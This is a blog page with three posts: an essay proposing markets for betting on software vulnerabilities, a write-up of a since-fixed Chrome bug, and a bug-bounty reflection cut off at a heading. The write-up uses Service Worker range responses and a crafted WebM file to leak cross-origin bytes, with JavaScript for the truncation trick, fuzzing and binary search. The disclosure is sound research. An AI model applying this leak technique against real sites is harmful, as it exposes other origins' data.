Monday, March 28, 2016

Creating a Decentralized Security Rewards Market

Imagine a world where you, a security researcher, could make money from your open source contributions and from your expertise in the security of any software. Without the intervention of the vendor, and without having to sell vulnerabilities to shady (and not-so-shady) third parties.

That is, on top of bug bounty programs, or 0-day gray markets, you could make money by following any disclosure policy you wish.

That's exactly what Rainer Böhme imagined over 10 years ago with what he called "Exploit Derivatives", and that's what I want to draw attention to today.

Hopefully, by the end of this post you'll be convinced that such a market would be good for the internet and can be made possible with today's technology and infrastructure, either officially (backed by financial institutions), or unofficially (backed by cryptocurrencies).

The advantages to software users

First of all, let me explain where the money would come from, and why.
Imagine Carlos, a Webmaster and SysAdmin for about 100 small businesses (dentists, restaurants, pet stores, and so on) in Argentina. Most of Carlos' clients just need email and a simple Wordpress installation. 
Carlos' business grew slowly but consistently, since more and more businesses wanted to go online, and word of Carlos' exceptional customer service spread. But as his client pool grew, the time he had to spend doing maintenance increased significantly. Since each client had a slightly customized installation for one reason or another, something broke every time an upgrade was scheduled, and attacks ranging from DoS to simple malware probing for SQL injection bugs left Carlos with less and less time to onboard new customers.
Users that depend on the security of a given piece of software would fund security research and development indirectly. They would do this by taking part in an open market to protect (or "hedge") their risk against a security vulnerability in the software they depend on.

The way they would do this "hedge" is by participating in a bet. Users would bet that the software they use will have a bug. Essentially, they would be betting against their own interests. This might sound strange, but it's not. Let me give you an example.

Imagine that you went to a pub to watch a soccer game of your favorite team against some obscure small new team. There's a 90% chance your favorite team will win, but if your team happened to lose, you would feel awful (nobody wants to lose against the small new team). You don't want to feel awful, so you bet against your own team (that is, you bet that your favorite team will lose) with the guy sitting next to you. Since the odds are 9:1 in favor of your favorite team, you would have to pay 1 USD to get 10 USD back (making a 9 USD profit), which you can use to buy a pint of beer for you and your friend.

This way, in the likely case your favorite team wins, you forfeit 1 USD, but feel great, because your team won! And in the unlikely case your favorite team loses, you get 10 USD and buy a pint of beer for you and your friend. While in reality loyalty to your team might prevent this situation from happening for most soccer fans, there's nothing stopping you from "betting" against your interests to do some damage control, and that's what is called "hedging" in finance.

This "hedge" could be used by Carlos in our example by betting that there will be a vulnerability in case he has to do an out-of-schedule upgrade on all his clients. If it doesn't happen, then good! He loses the bet, but doesn't have to do an upgrade. If he wins the bet, then he would get some money.

Companies usually do this because it reduces their volatility (eg, the quarter-to-quarter differences in returns), which makes them more stable, which in turn makes them more predictable, which means they become more valuable as a company.

Bug hunters joining the financial market

OK, this must sound like a ridiculous idea, and I must admit I worded it like this to make it sound crazy, but bear with me for a second. Bug hunters are the ones with the most to gain in this market, and I'll explain why.

Today's security researchers have a couple ways to earn money off their expertise:
  1. By contracting their expertise through a pentesting firm to software vendors, and users.
  2. By reporting bugs to the vendor, who might issue a reward in return (commonly called bug bounty programs).
  3. By reporting bugs in any way or form, and getting paid by interested parties (such as the Internet Bug Bounty).
  4. And to a lesser extent, by hardening code and claiming bounties for patches to OSS projects (via open source bounties, or patch reward programs).
Böhme's proposal is to add a new source of revenue for bug hunters, as a financial instrument, that has the following properties:
  • A one-time effort continues to yield returns in the long term
  • Not finding bugs is also profitable (almost as much as finding them)
  • Vulnerability price is driven by software security and popularity
  • Provides an incentive to harden software to be more secure
These reasons make this market extremely attractive for bug hunters, especially for those able to find hard-to-find bugs, as explained below.

Introducing exploit derivatives

The idea is simple. Allow bug hunters to trade with each other on their confidence on the security of a given piece of software, and allow users to hedge their risk on such market.
Mallory reviews some piece of software used by Carlos, say a Wordpress Vimeo plugin. Mallory thinks that while it's very badly written, there are no vulnerabilities in the code as currently written (say, out of luck, or simply because old exploitable bugs were fixed as they were found). As a result, Mallory "bets" that there won't be a bug in the Wordpress Vimeo plugin within the next year, and is willing to bet 100 USD that there won't be a bug against anyone willing to give her 10 USD. If there's a bug, Mallory has to pay 100 USD, but if there isn't one, Mallory gets 10 USD. In other words, Mallory would get a 10% ROI (return on investment).
Carlos, as we explained above, has over a hundred customers, and deploying an update to all of them would cost him at least one extra hour of work (on average). So, Carlos decides to take Mallory up on the bet. If he loses the bet, no problem, he lost 10 USD; but if he wins, he gets some money for spending an hour on maintenance.
By allowing users to trade "bets" (or, as they are called in finance, binary options) with bug hunters, the market satisfies the needs of both sides (the user "hedges" his risk to the market, and the bug hunter earns money). If there happens to be a bug, Mallory has to pay, sure, and she might lose money, but on average Mallory would earn more money, since she is the one setting her minimum price.
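
To make the mechanics concrete, here is a minimal sketch (in JavaScript, using the numbers from the example above; the function and field names are mine, not part of any proposal) of how such a "bet" settles for each side:

  // Settle the bet between Mallory (bets "no bug") and Carlos (bets "bug").
  // premium: what Carlos pays up front; payout: what Mallory owes if a
  // public vulnerability appears before the contract expires.
  function settleBet(bugPublished, premium, payout) {
    return {
      mallory: bugPublished ? premium - payout : premium,
      carlos: bugPublished ? payout - premium : -premium,
    };
  }

  console.log(settleBet(false, 10, 100)); // { mallory: 10, carlos: -10 }
  console.log(settleBet(true, 10, 100));  // { mallory: -90, carlos: 90 }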

Trading contracts with other bug hunters

Fig. 1 from Böhme 2006 [*]
An important aspect of this market is the ability for contracts to be traded with other bug hunters. That is because, over time, the understanding of a given piece of code might change, as other bug hunters have more time to review large code bases further and with more scrutiny.

As a result, it's important to be able to allow contracts to be exchanged and traded for a higher (if confidence in the software increased) or lower (if confidence in the software decreased) value.
Eve, on the other side of the world, did a penetration test of the Wordpress Vimeo plugin. Eve reaches a similar conclusion to Mallory's; however, Eve is a lot more confident in the security of the plugin. She actually found many bugs in the plugin in the past, and all of them were patched by Eve herself. As a result, she is very confident in its security, and offers a similar bet to Mallory's, but a bit cheaper. She is willing to bet 100 USD that there won't be a bug against anyone willing to give her 5 USD! 
At this point, Mallory can make money by simply buying this bet from Eve, unless Mallory is extremely confident there will not be a bug in the plugin. This is because if Mallory buys the bet, she will get 5 USD back no matter what happens. For example: if there is a bug, and Mallory loses the bet, she will get 100 USD from Eve, and then Mallory would give the 100 USD to Carlos. If there is no bug, then Mallory just made a 5 USD profit. This is what is known in finance as an "arbitrage opportunity".
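
Sketching that arbitrage with the same numbers (again, the code and names are mine, just for illustration), Mallory's net result no longer depends on whether a bug appears:

  // Mallory sold Carlos the bet for 10 USD and buys the same bet from Eve
  // for 5 USD. If a bug appears she owes Carlos 100 but collects 100 from
  // Eve, so her profit is locked in at 5 USD either way.
  function malloryNet(bugPublished) {
    var receivedFromCarlos = 10;
    var paidToEve = 5;
    var owedToCarlos = bugPublished ? 100 : 0;
    var collectedFromEve = bugPublished ? 100 : 0;
    return receivedFromCarlos - paidToEve - owedToCarlos + collectedFromEve;
  }

  console.log(malloryNet(true), malloryNet(false)); // 5 5
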
And obviously, this allows speculators (people that buy and sell these contracts looking to make a profit, but aren't users nor bug hunters) and market makers to join the market. Speculators and market makers provide an important service: "liquidity", because they supply more contracts than would be available from just users or bug hunters (liquidity is a financial term that means it's very easy to buy and sell things in a market).

Market makers - what? who? why?

The "market makers" are people that buy or sell financial instruments in bulk at a guaranteed price. They are essential to the market, not just because they make buying and selling contracts easier, but also because they make the price a lot more stable and predictable. Usually, the market makers are the ones that end up profiting the most off the market (but they also face a lot of risks in the process).

However, in the exploit derivatives market, profit isn't the only incentive to become a market maker. Ultimately, the market price will reflect the probability of an exploit being published before a given date. Market makers can make the exchange of a specific type of exploit derivative a lot more accessible to participants (both bug hunters and users), making these predictions a lot more accurate.

To give an example, imagine a market maker buys 1,000 options for "there will be a bug", and 1,000 options for "there won't be a bug" (with the same example of Carlos, Eve and Mallory). Without the market maker, Carlos would have to find Mallory, and Mallory would have to find Eve, which might be difficult. On the other hand, if a market maker exists, then they just need to know of the market maker at the exchange and buy from or sell to it.

As long as the market maker sells as many options on each side, its risk is minimized. The market maker would then purchase as many options as it needs to balance its risk, or raise the price as needed (for instance, if everyone wants to buy "there will be a bug", then it has to increase that price accordingly).
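
As a toy illustration of that mechanism (this is not a real pricing model, just a sketch I made up), a market maker might quote prices by leaning against whichever side of its book is getting heavy:

  // book.bug / book.noBug: how many contracts the market maker has sold on
  // each side. If everyone is buying "there will be a bug", that side gets
  // more expensive, which both balances the book and moves the price.
  function quote(book) {
    var total = Math.max(1, book.bug + book.noBug);
    var imbalance = (book.bug - book.noBug) / total;
    var pBug = Math.min(0.99, Math.max(0.01, 0.5 + 0.4 * imbalance));
    return {bugCostPerUsd: pBug, noBugCostPerUsd: 1 - pBug};
  }

  console.log(quote({bug: 900, noBug: 100})); // the "bug" side is now expensive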

And in case it wasn't obvious by now, the more "liquidity" in the market, the more accurate the prices become. And the more accurate they become, the more value there is in exploit derivatives as a "prediction" market. Note that another service provided by this is the decentralized, aggregated knowledge of the security community about whether a vulnerability exists or not, and that provides value to the community in and of itself[*].
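
This is where the "prediction" part comes from: the price of a contract that pays out if a bug is published is, roughly, the market's estimate of the probability of that bug. A back-of-the-envelope sketch with the numbers from the earlier example:

  // Mallory risks 100 USD to win a 10 USD premium, so she breaks even when
  // P(bug) * 100 == (1 - P(bug)) * 10, i.e. P(bug) = 10 / 110, about 9%.
  function impliedProbability(premium, payout) {
    return premium / (premium + payout);
  }

  console.log(impliedProbability(10, 100)); // ~0.09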

What happens if there's a bug?

When someone finds a bug, then the finder can make a lot of money! And that's the whole point of this blog post. This creates a strong financial incentive to do security research and make money off it in a more distributed manner that is compatible with existing vulnerability reward programs.

The way this would work is: when you find a bug, you buy as many "bets" for "there will be a bug" as you can, and then you report it to the vendor, or post it to full disclosure... whatever works for you. This essentially guarantees you will win the bet, and make a profit.

What's most interesting about this is that the profit you can make is defined by the market itself, not the vendor. This means that the software that the market believes to be most secure, as well as the most popular software, would yield the most money. And this actually incentivizes bug hunters to look at the most important pieces of infrastructure for the internet at any given point in time.

This is also likely to provide a higher price for bugs than existing security reward programs, and since the two aren't incompatible (as currently defined), there's nothing preventing you from getting both a reward and returns from the market.

Note this is actually the same as when you don't find a bug, except that not finding a bug yields profits from those trying to limit the risk of the existence of a vulnerability, and finding one yields profits from those that didn't find the bug.

Funding hardening and secure development

One of the best things about this market is that it would create a financial incentive to write secure software and to harden/patch existing software, which is something our industry hasn't done a particularly great job at.

There are two ways to fund secure development with exploit derivatives:
  • By bug hunters that have a long bet on the security of a product, and want to limit their liability
  • By donations to software vendors contingent on having no vulnerabilities for some time
Let me explain. If a bug hunter has a one-year bet that there won't be a new bug, then, unless the project has very little development and a history of being very secure, the bug hunter has a strong incentive to make sure new bugs are hard to introduce. The bug hunter could do this by refactoring APIs to be inherently secure, and by improving test coverage and the project's overall engineering practices.

The other way it funds secure development is by making donations contingent on the absence of vulnerabilities. It would be possible to make a donation of, say, 50 USD to an open source project, and give an extra 50 USD only if there are no vulnerabilities for a year (and if there are, the user gets his money back).
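
A rough sketch of how such a contingent donation could settle (the structure and field names here are hypothetical; in practice this would sit behind an escrow, a smart contract, or simply a trusted intermediary):

  // donation: {project, upfront, contingent, deadline}; advisories: public
  // vulnerability reports for that project. The upfront part is paid right
  // away; the contingent part is released only if no qualifying advisory
  // was published before the deadline, and refunded otherwise.
  function settleDonation(donation, advisories, now) {
    if (now < donation.deadline) return {status: 'pending'};
    var hadVuln = advisories.some(function(a) {
      return a.project === donation.project && a.published <= donation.deadline;
    });
    return hadVuln
        ? {status: 'refunded', toDonor: donation.contingent}
        : {status: 'released', toProject: donation.contingent};
  }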

Who decides what's a valid bug?

Who would be the decider for what is and isn't a bug? In the end, these people would have a lot of power in such a market. And per my experience on the vendor side of vulnerability reward programs, what is and isn't a bug is often difficult to decide objectively.

To compensate for such risk, as with any financial decision, one must "diversify" - in this case, diversifying means choosing as many "referees" (or "bug deciders") as possible.

In this day and age, CERTs provide such a service, as do vendors (through security advisories). As a result, one can make a bet based on those pieces of information (e.g., a CVSSv3 score above 7.0, or a bounty above $3,000). However, these might not always capture what the user wants to hedge against, and for those cases it would be better to create an incentive for market-specific deciders to make decisions.

One way to solve this problem, as pointed out by Böhme, is to make the conditions as clear as possible (which could make arbitration very cheap). One could imagine a preconfigured VM or Docker image that includes some "flags" which, under a specific attack scenario (e.g., same network, remote attacker, minimal user interaction), might be compromised. This is akin to a CTF competition, and would be quite obvious in the majority of cases.
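
A sketch of what this "cheap arbitration" could look like when the settlement conditions are purely mechanical (the advisory feed and field names here are made up; anything ambiguous would still go to a human referee, as discussed next):

  // Settle a contract from public data, e.g. "a vendor advisory for this
  // product with CVSSv3 >= 7.0 published before the expiry date".
  function settleContract(contract, advisories, now) {
    var match = advisories.find(function(a) {
      return a.product === contract.product &&
             a.published <= contract.expiry &&
             a.cvss >= contract.minCvss;
    });
    if (match) return {outcome: 'bug', evidence: match.id};
    if (now < contract.expiry) return {outcome: 'pending'};
    return {outcome: 'no bug'};
  }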

For more complex vulnerabilities or exploits, one might want human judgment to decide on the validity of an exploit. For example, the recent CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow has specific requirements that are clearly exploitable for most users, but might seem ridiculous to others. Having a trusted referee with sufficient expertise to decide and have a final say would go a long way to create a stable market.

And this actually creates another profit opportunity for widely known and trusted bug hunters. If the referees get a fee for their services, they can make a profit simply for deciding whether a piece of software has a known valid vulnerability or not. The most cool-headed, impartial referees would eventually earn higher fees based on their reputation in the community.

That said, human-based decisions would introduce ambiguity, and the more judgment you give the referees, the more expensive they become (essentially to remove the incentive of being bribed). While reputation might be something to prevent misbehavior by referees, in the long term, it would be better for the market (and a lot cheaper) to use CTF-style decisions, rather than depending on someone's judgment.

Vulnerability insurance and exploit derivatives

It's worth noting that while exploit derivatives look similar to insurance, they are quite different. Some important differences from insurance are:
  • For insurance you would usually only get money for losses you can demonstrate. In this case, money changes hands even when there is no loss! In other words, if a user buys insurance to cover losses from getting hacked, they will get all costs covered up to a specific amount. But when hedging, you get the money even if there is no loss (this essentially makes hedging a lot more expensive than insurance).
  • Another important difference is that insurers won't write an insurance policy to anyone, while anyone can trade a binary option as long as they have the funds to do so. This is because your personal risk of loss is irrelevant to the market. When you are trading options your identity is irrelevant.
That said, one could easily build an insurance contract on top of exploit derivatives. Insurance would reduce the price of the policy by only paying for actual, demonstrable losses, and would adjust the price of the policy depending on the risk each policy holder bears.

Note, however, that this is not the only way to do it; there is a lot of research on the subject of hedging risks with "information security financial instruments" led by Pankaj Pandey and Einar Arthur Snekkenes, who explain how several different incentives and markets can be built for this purpose[1][2][3][4].

Incentives, ethics and law

Exploit derivatives might create new incentives, some of which might look eerie, mostly related to different types of market manipulation:
  • Preventing vulnerability disclosure
  • Transfer risk from vendors to the community
  • Spreading lies and rumors
  • Legality and insider trading
  • Introducing vulnerabilities on purpose
I think it's interesting to discuss them, mostly because while some raise valid concerns, some others seem to be just misunderstandings, which we might be able to clarify. Think of this as a threat model.

Preventing vulnerability disclosure

An interesting incentive that Micah Schwalb pointed out in his paper from 2007 on the subject ("Exploit derivatives and national security") is that software vendors in the United States might have several resources at their disposal to prevent the public disclosure of security vulnerabilities. Specifically, he pointed out how several laws (DMCA, Trade Secrets, and Critical Infrastructure statutes) have been used, or could be used, by vendors to keep vulnerabilities secret forever.

It's clear that if vulnerabilities are never made public, it's very difficult to create a market like Exploit Derivatives, and that was the main argument Schwalb presented. However, we live in a different world now, where public disclosure of vulnerabilities is not only tolerated by software vendors, but celebrated and remunerated via vulnerability reward programs.

The concerns that Schwalb presented would still be valid for vendors that attempt to silence security research, however, fortunately for customers, a lot of vendors take a more open and transparent approach where public discussion of (fixed) vulnerabilities is supported by our industry.

Transfer risk from vendors to the community

One interesting consequence of a market like this, as pointed out by David, is that this market would transfer the financial risk of having a security vulnerability away from the software vendor, and push it towards the security community. That is because if the vendor is not involved, then the vendor can't lose any money for writing insecure software in the market.

However, the most important aspect to notice here is that the vendor is part of the market in a way, even if it doesn't want to be, and that is because the vendor is the only one that can make the software better (for non-free software). If the software's "security" trades for a very low price, then there's a clear financial incentive for the vendor to improve its security (for example, if some given software has a demand for bets that pay 9:1 that there will be a bug, the vendor can earn 10x its investment if it can make it so that there are no bugs anymore). So yes, the vendor doesn't have to absorb any risk from having a vulnerability, but it instead gets an incentive to improve the software.

Eventually, the vendor would stop investing in security as soon as the market stops demanding it, leading to software that is as secure as its users want it to be (or more, if the vendor wants to, for any other reasons).

Spreading lies and rumors

Real markets have historically been vulnerable to social engineering. In fact, there are countless cases where media misunderstandings or mistranslations have had dire consequences for the economy.

Additionally, things like ZDI's upcoming advisories list would suddenly become extremely profitable if someone were to hack or MITM that page at the right time. Same for "side channels" for security vulnerabilities, or embargoes of vulnerabilities in popular software.

But, as lcamtuf pointed out, some of these channels might not even require a targeted attack. An early heads-up from a trusted maintainer could be spoofed, and wiki pages used to make security announcements, if anyone can edit them, could easily be used to manipulate the market.

If anything, the media tends to exaggerate news stories. A small vulnerability is always amplified a hundred times by the media, which could cause chaos in the market. At this point, referees wouldn't even have to be involved, and trading would just be based on speculation.

But this is a perfect arbitrage opportunity for those that get a chance to notice it. In this case, one could check the headers of the email, double-check the statement with the maintainer, or just see who made the update to the wiki. If something looks fishy, then a speculator would be able to capitalize on the market uncertainty and balance the price back to normal. This is essentially how the free market deals with this risk in other markets.

Finally, this would incentivize software maintainers to improve their security patch release coordination. Perhaps it would make CERT more popular, or at least it would create an incentive for CERT to act as a trusted third party for the release and scoring of software vulnerabilities, which would also end up being good for the market.

Insider trading and vulnerabilities

If you thought of insider trading when reading about creating a vulnerability market, then you are not alone. But insider trading is a commonly misunderstood concept, and in an exploit derivatives market it wouldn't really apply to most freelance bug hunters (although it might apply to developers and employees of some companies). Let me explain.

Insider trading is essentially when someone with a "fiduciary duty" (explained below) and access to non-public information makes a trade in the market. You might think that this means that if someone finds a bug, they would be committing insider trading if they "bet" that there will be a bug, but for most bug hunters this really shouldn't be the case.

First of all, for open source software, where no binary analysis nor reverse engineering is required, the bug hunter would be acting with public information (the source code) when making the trade. The fact the bug hunter was able to see a vulnerability is equivalent to a financial analyst being able to see an arbitrage opportunity in the market.

Another point is that the majority of bug hunters shouldn't have "fiduciary duty" to other market participants, so there shouldn't be a conflict of interest there. Here's the definition of fiduciary duty.
A fiduciary duty is a legal duty to act solely in another party's interests. Parties owing this duty are called fiduciaries. The individuals to whom they owe a duty are called principals. Fiduciaries may not profit from their relationship with their principals unless they have the principals' express informed consent.
https://www.law.cornell.edu/wex/fiduciary_duty
Employees (whether developers, bug hunters, or otherwise) of companies that use the software, however, might be restricted from engaging in such trades, depending on how they got the information, and when[*]. For a final say on the subject, participants would have to get advice from a lawyer with experience in "Securities and Corporate Law".

Note, however, that insider trading wouldn't necessarily be bad for this market [1][2], and this wouldn't even be something one would need to think about until a market like this is regulated (if it is regulated at all). But either way, that's a discussion better left to economists and lawyers, not security researchers :)

On the other hand, looking at the benefits of having companies participate in this market:
  • Employers could give exploit derivatives as compensation to employees, in bundles that pay if there are no public exploits, as a way to incentivize security, which would be good for both the users and the market. Equity is already a big part of compensation for most companies, especially startups, so adding a new instrument as compensation would provide a more concrete mechanism for developers to influence its value (by writing more secure software).
  • Victims of 0-day vulnerabilities would have a financial incentive to try and recover the exploit used to attack them (via forensics, reverse engineering or otherwise), as today there's very little incentive for victims to speak out and share technical details. This could of course be done anonymously, as the community would only care about the technical details, and less so about the identity of the victim.

Introducing vulnerabilities on purpose

The most dangerous incentive that a market like this could create is that of introducing vulnerabilities on purpose. Fraud like this is also a danger to the trustworthiness of the market, and because of the distributed nature of open source software, it would be very hard to bring civil or criminal charges against someone that did this. However, this should be addressed by the market in two ways:
  • Price - Software that accepts third-party contributions with little oversight over them, or that has a large development team that might not be as trustworthy, would yield low returns for backdoors or bugs introduced on purpose. And while introducing a vulnerability without being noticed is definitely possible, software with strict engineering practices and stringent code review processes would end up being the highest valued in the market.
  • Competition - Participants in the market with long-term investments in the security of software will compete with those trying to introduce bugs. Practically, the stakes are the same on both sides, so it would be as easy to make money by making software safer as by doing the opposite (and without the risk incurred by introducing bugs on purpose).
Finally, this could also be mitigated by donations that pay maintainers only if there are no vulnerabilities. Contracts would be structured in ways that limit the risk (say, by requiring code to be in the code base for a long time) and make this avenue less profitable than making the software more secure.

In the end, we would incentivize open source software maintainers to be more careful with the patches they accept, and to employ safer engineering practices for the project. We would also create more oversight by interested third parties, and hopefully make software safer as a result.

Conclusions

If you've read this far down the blog post, you might either be as excited about this as I am, or you are waiting for me to pitch you my new startup! Well, fear not... There is no startup, but I am most definitely ready to abuse your enthusiasm and encourage you to help make this a reality! Either by sharing your thoughts, sharing this with your friends, or reviewing its design.

Exploit derivatives got some attention in the years after the idea was published, but never wide enough attention in the security community (although in 2011, projects like BeeWise and Consensus Point briefly experimented with it).

It seems that in 2006 our industry had little experience with vulnerability markets, and in 2011 it was too complex and expensive to set up a prediction market, which probably made the upfront cost of this market extremely high. But fast-forward to 2016: prediction markets abound[1][2][3] for topics as varied as politics, economics, and entertainment, and creating decentralized markets with cryptocurrency is not only possible and accessible, but also something the security and open source community is already investing in heavily (although, surprisingly, not for software security!).

I think experimenting with this market using a cryptocurrency would allow us to test the idea very quickly. For example, we could use Augur [despite its controversy], a recently launched project (currently in beta, so no money is being exchanged yet) that creates a decentralized prediction market which can be used for exploit derivatives among other things (and most importantly, has an API that could be used to build a security vulnerability prediction market on top of it).

Anyway, to finalize this blog post, I have one last request. If you are interested in discussing exploit derivatives, I just created a mailing list to talk about it here:
There's nothing on it yet, but I would love to hear your feedback! Positive and negative. Especially if you or someone you know has experience in security research, financial markets or security economics.

I would be particularly interested to hear from you if you think this might have other positive or negative incentives in the security or open-source community.

Thank you for reading, and thanks to Rainer, Pankaj, Michal, David, Miki, Dionysis and Mario for their comments.

Note that this is a personal blog. What I say in this blog does not imply in any form an endorsement from my employer, nor necessarily reflects my employer's views or opinions on the subject.

Sunday, October 04, 2015

Range Responses: Mix, Match & Leak

Hey!

The videos from AppSec 2015 are now online, and the Service Workers talk is too. Anyway, this post is about another of the slides in the presentation, about Range Requests / Responses (more commonly known as Byte Serving) and Service Workers.

As things go, turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that only contain a subset of the body. It works like this:

It's relatively straightforward! With service workers in the mix, you can do similar things:

And, I mean, what happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin, since Service Workers apply to the page that created the request (so, say, if evil.com embeds a video from apple.com, the service worker from evil.com will be able to intercept the request to apple.com). One thing to note about this is that the Service Worker actually controls the total length of the response. What this means is that even if the actual response is 2MB, if the Service Worker says it's 100KB, the browser will believe the Service Worker (it seems browsers respect the first response size they see, in this case, the one from the service worker).

This all started when I noticed that you could split a response in two: one part generated by a Service Worker and one that isn't. To clarify, the code below intercepts a request to a song. What's interesting about it is that it actually serves part of the response from the Service Worker (the first 3 bytes).

Another interesting aspect, is that the size of the file is truncated to 5,000 bytes. This is because the browser remembers the first provided length.

The code for this (before the bug was patched by Chrome) was:
  // This runs inside the service worker's fetch handler, i.e. something like:
  //   self.addEventListener('fetch', function(e) {
  //     var url = new URL(e.request.url);
  //     ...
  //   });

  // Basic truncation example
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    // Only intercept the initial range request for the whole resource.
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
      // Serve the first bytes ('Ogg') ourselves, and claim the whole
      // resource is only 5,000 bytes long.
      e.respondWith(
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-3/5000'}}))
    } else {
      // Later range requests fall through to the network untouched.
      console.log('ignoring request');
    }
    return;
  }
So, to reiterate, the service worker responds with "Ogg" as the first three bytes and truncates the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what if you can make a bad song last 1 second rather than 30 seconds?

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses, it just sees a stream of bytes. Imagine if the video that the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
But imagine the content in orange (the header and the video frame) comes from the Service Worker, and the content in red (the checksum) comes from the target/victim site. A clever attacker would send 65 thousand different video frames until one of them doesn't error out, and then we would know the value of bytes 201 and 202 of the target/victim site.

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard as it's really confusing to read these specs but essentially after like 1 hour of searching and scratching my head I gave up, and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from length 0-X, and claim a length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
And whenever it found a difference between the response for 0-X and 0-(X+1), that means there's an info leak! I did this, and in a few hours, after wasting my time looking at MP3 files (it seems they just give out approximate durations at random), I found a candidate. Turns out it wasn't a checksum, it was something even better! :)
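
The harness was roughly along these lines (this is a reconstruction, not the original code: the element handling, event list, and URL scheme are mine; a companion service worker would serve each URL as a 206 response truncated to the requested length, with 0xFF as the forged final byte):

  // Load the same truncated sample twice, claiming length X and X+1, and
  // diff the media events each one fires. A difference means the decoder
  // behaved differently depending on the final byte: an info leak.
  function mediaEvents(src) {
    return new Promise(function(resolve) {
      var v = document.createElement('video');
      var seen = [];
      ['error', 'loadedmetadata', 'durationchange', 'encrypted', 'canplay']
          .forEach(function(ev) {
            v.addEventListener(ev, function() { seen.push(ev); });
          });
      v.src = src;
      setTimeout(function() { v.removeAttribute('src'); resolve(seen); }, 2000);
    });
  }

  function fuzz(sample, x) {
    return Promise.all([
      mediaEvents('/clip?src=' + sample + '&len=' + x),
      mediaEvents('/clip?src=' + sample + '&len=' + (x + 1)),
    ]).then(function(results) {
      if (results[0].join() !== results[1].join()) {
        console.log('possible info leak in', sample, 'at offset', x, results);
      }
    });
  }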

So, I found that a specific Encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but that's a good start, I guess. I created a proof of concept, where I tested whether the byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see this proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is because in the position 306 of the robots.txt of www.bing.com there is a new line, while in the position 306 of www.yahoo.com there is a letter.

Good enough you might think! I can now know whether position 306 is a space or not. Not really very serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to know how to make this apply to any offset, not just 306. It was easy enough to just create another EBML object of arbitrary size. Then that's about it! You just make the size longer and longer. So first problem solved. Now you can change the byte offset you are testing.

But still, the only thing I can know is whether the character at that position is a space or not. So, I started looking into why it errored out, and it turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video for some reason, and the byte at position 306 happened to be part of the video's height, which ended up larger than what is valid.

So, well... now that we know that, can we learn the exact value? What if we tried to load the video 256 times, each time with a different width value, so that it overflows only if the combined size is too big? The formula the video decoder was using for calculating the maximum dimensions is:


So! Seems easy enough then. I get the minimum value at which it errors out, and calculate its complement to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison, you can find this minimum value with a simple binary search.
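
A sketch of that binary search (the `errorsOutWithWidth` oracle is hypothetical: it would rebuild the crafted WebM with the given width, load it, and resolve to true if the decoder rejects it because the dimensions are too large):

  // Find the smallest width that makes the decoder reject the video. The
  // check is monotonic (a "less than" comparison), so binary search works.
  function findMinErrorWidth(errorsOutWithWidth, lo, hi) {
    // Invariant: widths >= hi error out, widths < lo decode fine.
    function step() {
      if (lo >= hi) return Promise.resolve(lo);
      var mid = Math.floor((lo + hi) / 2);
      return errorsOutWithWidth(mid).then(function(errored) {
        if (errored) { hi = mid; } else { lo = mid + 1; }
        return step();
      });
    }
    return step();
  }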

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal byte by byte of the robots.txt of www.bing.com.

Severity-wise, fortunately, this isn't an end-of-the-world situation. Range Responses (or Byte Serving) don't actually work on any dynamically generated content I found online. This is most likely because dynamically generated content isn't static, so requesting it in chunks doesn't make sense.

And that's it for today! It's worth noting that this possibly isn't specific to Service Workers, as it seems that HTTP redirects have a similar effect (you make two requests to a same-origin video; the first time you respond with a truncated video, the second time you redirect to another domain).

Especially since Service Workers aren't as widely supported yet. Feel free to write a PoC for that (you can use this for inspiration). And once the bug is public, you can follow along the bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed by like 3 months because of Chrome, so I didn't want to embargo this further). If you do find a way to exploit this elsewhere, please let me know the results, and I'm happy to help if you get stuck.

Have a nice day!

Tuesday, September 22, 2015

Not about the money

This applies to all posts in this blog, but just as a reminder. What I say here doesn't necessarily have to reflect the opinions of my employer. This is just my personal view on the subject.

I want to briefly discuss bug bounties, security rewards, and security research in general. Mostly because a lot has changed in the last five years; there are many new players, some giving rewards and some receiving them.

Background

As a brief introduction, I'll preface this by explaining why I (personally) used to (and continue to) report bugs back when there was no money involved, and then try to go from there to where we are today.

Before there were bug bounties, I (and many others) used to report bugs for free to companies, and we usually got "credit" as the highest reward, but I actually didn't do it for the credit (it was a nice prize, but that's it).

The reason I did it was because I am a user and I (selfishly) tried to make the products I used, better and safer for me. Another reason was that the challenge of finding bugs in "big" companies was like solving an unsolvable puzzle. Like the last level of a wargame that the developers thought no one could solve.

Rewards

With that said, I was super excited when companies started paying for bugs (mostly because I had no money), but also because it felt "right". For a couple of reasons, but mostly because money is free for companies and it is a good way to materialize appreciation.

Rewards are a great way to say "thank you for your time and effort". It's like a gift, that just happens to come in US Dollars. Before money, T-Shirts were the equivalent, and sometimes even handwritten notes that said thank you.

It goes without saying that respect was also a big factor for me. Speedy responses, a human touch, and honest feedback always mattered a lot to me, and gave me confidence back when I was starting. Especially when I learnt something new.

Appreciation

